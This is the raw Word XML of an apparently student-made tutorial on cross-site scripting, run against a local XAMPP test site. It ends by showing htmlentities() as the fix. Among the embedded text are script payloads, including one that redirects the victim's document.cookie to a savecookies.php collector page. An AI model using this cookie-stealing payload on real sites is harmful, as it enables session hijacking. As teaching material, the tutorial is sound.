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9C9" w:rsidRDefault="00287ABD">
      <w:r>
        <w:t>Results of XSS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00287ABD" w:rsidRDefault="00287ABD">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IE"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IE"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="407BDC61">
            <wp:extent cx="4907280" cy="1565979"/>
            <wp:effectExtent l="95250" t="95250" r="102870" b="914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0254" cy="1566928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87ABD" w:rsidRDefault="00287ABD">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00287ABD" w:rsidRDefault="00287ABD">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IE"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3977640" cy="2477050"/>
            <wp:effectExtent l="95250" t="95250" r="99060" b="952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7F65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549" cy="248446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87ABD" w:rsidRPr="00287ABD" w:rsidRDefault="00287ABD" w:rsidP="00287ABD"/>
    <w:p w:rsidR="00287ABD" w:rsidRPr="00287ABD" w:rsidRDefault="00287ABD" w:rsidP="00287ABD"/>
    <w:p w:rsidR="00287ABD" w:rsidRDefault="00287ABD" w:rsidP="00287ABD">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IE"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3475021" cy="3231160"/>
            <wp:effectExtent l="95250" t="95250" r="87630" b="1028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347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21" cy="32311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287ABD" w:rsidRDefault="00287ABD" w:rsidP="00287ABD">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00287ABD" w:rsidRDefault="00287ABD" w:rsidP="00287ABD">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IE"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5F44CE24" wp14:editId="6DA53476">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>80645</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4320540" cy="3672840"/>
            <wp:effectExtent l="95250" t="95250" r="99060" b="9906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359B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67284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ABD" w:rsidRDefault="00287ABD" w:rsidP="00287ABD">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IE"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="198137" cy="762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D450.t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8137" cy="7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7ABD" w:rsidRPr="00287ABD" w:rsidRDefault="00287ABD" w:rsidP="00287ABD"/>
    <w:p w:rsidR="00287ABD" w:rsidRPr="00287ABD" w:rsidRDefault="00287ABD" w:rsidP="00287ABD"/>
    <w:p w:rsidR="00287ABD" w:rsidRPr="00287ABD" w:rsidRDefault="00287ABD" w:rsidP="00287ABD"/>
    <w:p w:rsidR="00287ABD" w:rsidRPr="00287ABD" w:rsidRDefault="00287ABD" w:rsidP="00287ABD"/>
    <w:p w:rsidR="00287ABD" w:rsidRPr="00287ABD" w:rsidRDefault="00287ABD" w:rsidP="00287ABD"/>
    <w:p w:rsidR="00287ABD" w:rsidRPr="00287ABD" w:rsidRDefault="00287ABD" w:rsidP="00287ABD"/>
    <w:p w:rsidR="00287ABD" w:rsidRPr="00287ABD" w:rsidRDefault="00287ABD" w:rsidP="00287ABD"/>
    <w:p w:rsidR="00287ABD" w:rsidRPr="00287ABD" w:rsidRDefault="00287ABD" w:rsidP="00287ABD"/>
    <w:p w:rsidR="00287ABD" w:rsidRPr="00287ABD" w:rsidRDefault="00287ABD" w:rsidP="00287ABD"/>
    <w:p w:rsidR="00287ABD" w:rsidRPr="00287ABD" w:rsidRDefault="00287ABD" w:rsidP="00287ABD"/>
    <w:p w:rsidR="00287ABD" w:rsidRPr="00287ABD" w:rsidRDefault="00287ABD" w:rsidP="00287ABD"/>
    <w:p w:rsidR="00287ABD" w:rsidRDefault="00287ABD" w:rsidP="00287ABD"/>
    <w:p w:rsidR="00287ABD" w:rsidRDefault="00287ABD" w:rsidP="00287ABD">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="8136"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00287ABD" w:rsidRDefault="00287ABD" w:rsidP="00287ABD">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="8136"/>
        </w:tabs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59264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="54120CE7" wp14:editId="5385E849">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-68580</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-106680</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4300220" cy="3009900"/>
            <wp:effectExtent l="95250" t="95250" r="100330" b="9525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A211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220" cy="300990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87ABD" w:rsidRDefault="00287ABD" w:rsidP="00287ABD">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="8136"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C95F9C" w:rsidRDefault="00C95F9C" w:rsidP="00C95F9C">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="8136"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IE"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251660288" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5ACDACE5" wp14:editId="1F6EA7EF">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-5097145</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>2622550</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4884420" cy="3117215"/>
            <wp:effectExtent l="0" t="0" r="0" b="698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A588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442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Pr="00C95F9C" w:rsidRDefault="00C95F9C" w:rsidP="00C95F9C"/>
    <w:p w:rsidR="00C95F9C" w:rsidRDefault="00C95F9C" w:rsidP="00C95F9C"/>
    <w:p w:rsidR="00287ABD" w:rsidRDefault="00C95F9C" w:rsidP="00C95F9C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>No matter if I refresh the page the java script still runs.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C95F9C" w:rsidRDefault="00C95F9C" w:rsidP="00C95F9C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C95F9C">
        <w:t>&lt;script type="</w:t>
      </w:r>
      <w:r>
        <w:t>text/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>javascript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">"&gt;alert("XSS by </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>enda</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C95F9C">
        <w:t>");&lt;/script&gt;﻿</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A1600" w:rsidRDefault="005A1600" w:rsidP="005A1600">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005A1600" w:rsidRDefault="005A1600" w:rsidP="005A1600">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005A1600" w:rsidRDefault="005A1600" w:rsidP="005A1600">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005A1600" w:rsidRDefault="005A1600" w:rsidP="005A1600">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005A1600" w:rsidRDefault="005A1600" w:rsidP="005A1600">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005A1600" w:rsidRDefault="005A1600" w:rsidP="005A1600">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005A1600" w:rsidRDefault="005A1600" w:rsidP="005A1600">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005A1600" w:rsidRDefault="005A1600" w:rsidP="005A1600">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005A1600" w:rsidRDefault="005A1600" w:rsidP="005A1600">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/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61312" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3A372C6A" wp14:editId="71AFC1EF">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>236220</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-502920</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5356860" cy="2308860"/>
            <wp:effectExtent l="76200" t="76200" r="129540" b="12954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F8CF.tmp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6860" cy="23088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D1FB7" w:rsidRDefault="00BD1FB7" w:rsidP="005A1600">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">To retrieve cookie information </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007840CA" w:rsidRDefault="005A1600" w:rsidP="005A1600">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005A1600">
        <w:t>&lt;script type="text/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005A1600">
        <w:t>javascript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005A1600">
        <w:t>"&gt;alert(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007840CA">
        <w:t>document.cookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007840CA">
        <w:t>);&lt;/script&gt;﻿</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007840CA" w:rsidRPr="007840CA" w:rsidRDefault="007840CA" w:rsidP="007840CA">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IE"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251662336" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="757BEDA0" wp14:editId="2E581C52">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>350520</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>100330</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2621280" cy="1653540"/>
            <wp:effectExtent l="0" t="0" r="7620" b="381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7E22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28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840CA" w:rsidRPr="007840CA" w:rsidRDefault="007840CA" w:rsidP="007840CA"/>
    <w:p w:rsidR="007840CA" w:rsidRPr="007840CA" w:rsidRDefault="007840CA" w:rsidP="007840CA"/>
    <w:p w:rsidR="007840CA" w:rsidRDefault="007840CA" w:rsidP="007840CA"/>
    <w:p w:rsidR="00BD1FB7" w:rsidRDefault="00BD1FB7" w:rsidP="007840CA">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007840CA" w:rsidRDefault="007840CA" w:rsidP="007840CA">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007840CA" w:rsidRDefault="007840CA" w:rsidP="007840CA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="732"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>Only the user will be able to see it not the hacker.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007840CA" w:rsidRDefault="007840CA" w:rsidP="007840CA">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="732"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007840CA" w:rsidRDefault="007840CA" w:rsidP="007840CA">
      <w:r>
        <w:t>Create two more files savecookies.php and sav.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007840CA" w:rsidRDefault="007840CA" w:rsidP="007840CA">
      <w:r>
        <w:t xml:space="preserve">Savecookies.php </w:t>
      </w:r>
      <w:r w:rsidR="001801A4">
        <w:t>passes a parameter known as cookies and stores it in the save.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001801A4" w:rsidRDefault="001801A4" w:rsidP="007840CA">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IE"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4282440" cy="1718480"/>
            <wp:effectExtent l="0" t="0" r="381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B75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077" cy="1717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A4" w:rsidRDefault="007840CA" w:rsidP="00751231">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007840CA">
        <w:t>&lt;script type="text/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007840CA">
        <w:t>javascript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007840CA">
        <w:t>"&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007840CA">
        <w:t>window.location</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007840CA">
        <w:t xml:space="preserve"> = 'http://localhost/hacked/</w:t>
      </w:r>
      <w:r w:rsidR="003F6B63">
        <w:t>XSS/H</w:t>
      </w:r>
      <w:r w:rsidR="00784EE8">
        <w:t>ack</w:t>
      </w:r>
      <w:r w:rsidR="003F6B63">
        <w:t>able</w:t>
      </w:r>
      <w:r w:rsidR="00784EE8">
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="007840CA">
        <w:t>savecookies.ph</w:t>
      </w:r>
      <w:r w:rsidR="001801A4">
        <w:t>p?cookies=hello';&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007840CA" w:rsidRDefault="001801A4" w:rsidP="001801A4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1896"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="001801A4" w:rsidRDefault="001801A4" w:rsidP="001801A4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1896"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001801A4" w:rsidRDefault="001801A4" w:rsidP="001801A4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1896"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IE"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5464013" cy="308636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36EC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13" cy="3086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A4" w:rsidRDefault="001801A4" w:rsidP="001801A4"/>
    <w:p w:rsidR="001801A4" w:rsidRDefault="001801A4" w:rsidP="001801A4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">We passed hello as the cookie  </w:t>
      </w:r>
      <w:r w:rsidR="002C65FF">
        <w:t>parameter</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001801A4" w:rsidRDefault="001801A4" w:rsidP="001801A4"/>
    <w:p w:rsidR="001801A4" w:rsidRDefault="001801A4" w:rsidP="001801A4">
      <w:r w:rsidRPr="001801A4">
        <w:t>&lt;script type="text/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001801A4">
        <w:t>javascript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001801A4">
        <w:t>"&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001801A4">
        <w:t>window.location</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001801A4">
        <w:t xml:space="preserve"> = 'http</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001801A4">
        <w:t>:/</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001801A4">
        <w:t>/localhost/hacked/</w:t>
      </w:r>
      <w:r w:rsidR="00F02B6E" w:rsidRPr="00F02B6E">
        <w:t>XSS</w:t>
      </w:r>
      <w:r w:rsidR="003F6B63">
        <w:t>/H</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidR="003F6B63" w:rsidRPr="003F6B63">
        <w:t>ackable</w:t>
      </w:r>
      <w:r w:rsidR="00F02B6E" w:rsidRPr="001801A4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F247F2">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001801A4">
        <w:t>savecookies.php?cookies</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001801A4">
        <w:t>='+</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001801A4">
        <w:t>document.cookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001801A4">
        <w:t>;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001801A4" w:rsidRDefault="001801A4" w:rsidP="001801A4">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IE"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3558848" cy="1402202"/>
            <wp:effectExtent l="0" t="0" r="381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408854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40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1A4" w:rsidRPr="001801A4" w:rsidRDefault="00F02B6E" w:rsidP="001801A4">
      <w:r w:rsidRPr="00F02B6E">
        <w:t>C:\xampp\htdocs\hacked\Cross-site Scripting XSS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001801A4" w:rsidRDefault="001801A4" w:rsidP="001801A4"/>
    <w:p w:rsidR="001801A4" w:rsidRDefault="001801A4" w:rsidP="001801A4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2136"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B633DE" w:rsidRDefault="00B633DE" w:rsidP="001801A4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2136"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B633DE" w:rsidRDefault="00B633DE" w:rsidP="001801A4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2136"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B633DE" w:rsidRDefault="00B633DE" w:rsidP="001801A4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2136"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B633DE" w:rsidRDefault="00B633DE" w:rsidP="001801A4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2136"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B633DE" w:rsidRDefault="00B633DE" w:rsidP="001801A4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2136"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B633DE" w:rsidRDefault="00B633DE" w:rsidP="001801A4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2136"/>
        </w:tabs>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B633DE">
        <w:lastRenderedPageBreak/>
        <w:t>htmlentities</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B633DE">
        <w:t>()</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B633DE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B633DE" w:rsidRDefault="00B633DE" w:rsidP="001801A4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2136"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IE"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3291840" cy="1687863"/>
            <wp:effectExtent l="76200" t="76200" r="137160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7C5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2569" cy="168823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33DE" w:rsidRDefault="00B633DE" w:rsidP="00B633DE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2136"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>Imagine that this was a comment by some entering HTML code into our comment box.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B633DE" w:rsidRDefault="00B633DE" w:rsidP="00B633DE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2136"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">By using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B633DE">
        <w:t>htmlentities</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B633DE">
        <w:t xml:space="preserve">() </w:t>
      </w:r>
      <w:r>
        <w:t>we can turn html code into plain text</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B633DE" w:rsidRDefault="00E507A0" w:rsidP="00B633DE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="2136"/>
        </w:tabs>
        <w:ind w:left="1452"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IE"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251663360" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="109B3AEA" wp14:editId="2E2FCE9E">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-716280</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>247015</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3649980" cy="1379220"/>
            <wp:effectExtent l="0" t="0" r="762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F06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3DE" w:rsidRDefault="00B633DE" w:rsidP="001801A4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2136"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B633DE" w:rsidRDefault="00B633DE" w:rsidP="001801A4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2136"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B633DE" w:rsidRDefault="00E507A0" w:rsidP="001801A4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2136"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IE"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251665408" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="34666F81" wp14:editId="58D08034">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-3813810</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>214630</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3340735" cy="2125980"/>
            <wp:effectExtent l="0" t="0" r="0" b="762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E0D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735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33DE" w:rsidRDefault="00B633DE" w:rsidP="001801A4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2136"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B633DE" w:rsidRDefault="00B633DE" w:rsidP="001801A4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2136"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B633DE" w:rsidRDefault="00B633DE" w:rsidP="001801A4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2136"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B633DE" w:rsidRDefault="00B633DE" w:rsidP="001801A4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2136"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B633DE" w:rsidRDefault="00B633DE" w:rsidP="001801A4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2136"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E507A0" w:rsidRDefault="00E507A0" w:rsidP="001801A4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2136"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E507A0" w:rsidRDefault="00E507A0" w:rsidP="001801A4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2136"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E507A0" w:rsidRDefault="00E507A0" w:rsidP="001801A4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2136"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IE"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251664384" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7676EFE2" wp14:editId="4BDD9A73">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-471170</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>106680</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4175760" cy="1709420"/>
            <wp:effectExtent l="0" t="0" r="0" b="508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5F0D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576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07A0" w:rsidRDefault="00E507A0" w:rsidP="001801A4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2136"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E507A0" w:rsidRDefault="00E507A0" w:rsidP="001801A4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2136"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E507A0" w:rsidRDefault="00E507A0" w:rsidP="001801A4">
      <w:pPr>
